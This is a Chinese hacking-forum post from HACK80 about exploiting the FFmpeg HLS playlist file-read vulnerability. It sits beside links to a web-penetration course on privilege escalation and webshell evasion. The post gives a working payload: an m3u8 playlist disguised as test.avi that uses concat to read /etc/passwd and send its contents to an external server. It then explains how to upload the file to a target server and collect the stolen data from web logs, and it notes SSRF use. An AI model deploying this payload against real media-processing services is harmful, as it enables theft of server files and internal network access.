HACK80

我们很年轻,但我们有信念、有梦想!

我们坚信只有今天付出了,才有机会看到明天的太阳!
现在!加入我们,给你一个气氛优秀的技术圈子

作者: @w=无名
查看: 53|回复: 0

more +随机图赏Gallery

2017年中旬WEB渗透系列课程-26Mysql下UDF提权2017年中旬WEB渗透系列课程-26Mysql下UDF提权
2017年中旬WEB渗透系列课程-25基于php参数开关的提权2017年中旬WEB渗透系列课程-25基于php参数开关的提权
2017年中旬WEB渗透系列课程-24提权分类2017年中旬WEB渗透系列课程-24提权分类
2017年中旬WEB渗透系列课程-23提权认识2017年中旬WEB渗透系列课程-23提权认识
2017年中旬WEB渗透系列课程-22CMS相关2017年中旬WEB渗透系列课程-22CMS相关
2017年中旬WEB渗透系列课程-21webshell免杀相关问题2017年中旬WEB渗透系列课程-21webshell免杀相关问题
2017年中旬WEB渗透系列课程-20关于指令执行2017年中旬WEB渗透系列课程-20关于指令执行
2017年中旬WEB渗透系列课程-19文件包含与目录遍历2017年中旬WEB渗透系列课程-19文件包含与目录遍历
2017年中旬WEB渗透系列课程-18上传绕过方法演示2017年中旬WEB渗透系列课程-18上传绕过方法演示
2017年中旬WEB渗透系列课程-17了解上传检测方式2017年中旬WEB渗透系列课程-17了解上传检测方式

FFmpeg文件读取漏洞测试及利用

[复制链接]
@w=无名 发表于 7 天前 | 显示全部楼层 |阅读模式
查看: 53|回复: 0
经历过
ImageMagick命令执行漏洞的洗礼之后,又有FFmpeg文件读取漏洞,真是很激情。
看了老外写的文章,大概理解的利用方式如下:
#EXTM3U#EXT-X-MEDIA-SEQUENCE:0#EXTINF:10.0,concat:http://www.secpulse.com/header.m3u8|file:///etc/passwd#EXT-X-ENDLIST
以上内容保存成test.avi,是用来上传到被攻击服务器的。
#EXTM3U#EXT-X-MEDIA-SEQUENCE:0#EXTINF:,http://www.secpulse.com?
以上内容保存成header.m3u8,将header.m3u8上传到你的服务器,然后把test.avi上传到攻击服务器,如果有漏洞,会收到如下的日志:
会收到三条日志记录,第一条是请求header.m3u8文件的,第三条中就包含了读取的部分文件内容,说明是存在此漏洞的。
header.m3u8文件的内容大概是将让你的web产生日志并且传回读取的文件内容。
这个漏洞可以用来本地文件读取(返回部分内容)和SSRF。

具体的参考老外写的分析文章:
https://habrahabr.ru/company/mailru/blog/274855/
还有ffmpeg的说明文档:
https://www.ffmpeg.org/ffmpeg-protocols.html#concat
还有hackerone的漏洞报告
SSRF and local file read in video to gif converter


本帖子中包含更多资源

正式会员需要 登录 才可以下载或查看,没有帐号?立即注册

x
正式会员需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|手机版|小黑屋|HACK80 ( 沪ICP备15007512号 )

GMT+8, 2017-10-19 15:04 , Processed in 0.064546 second(s), 29 queries .

Powered by Discuz! X3.2 © 2001-2013 Comsenz Inc.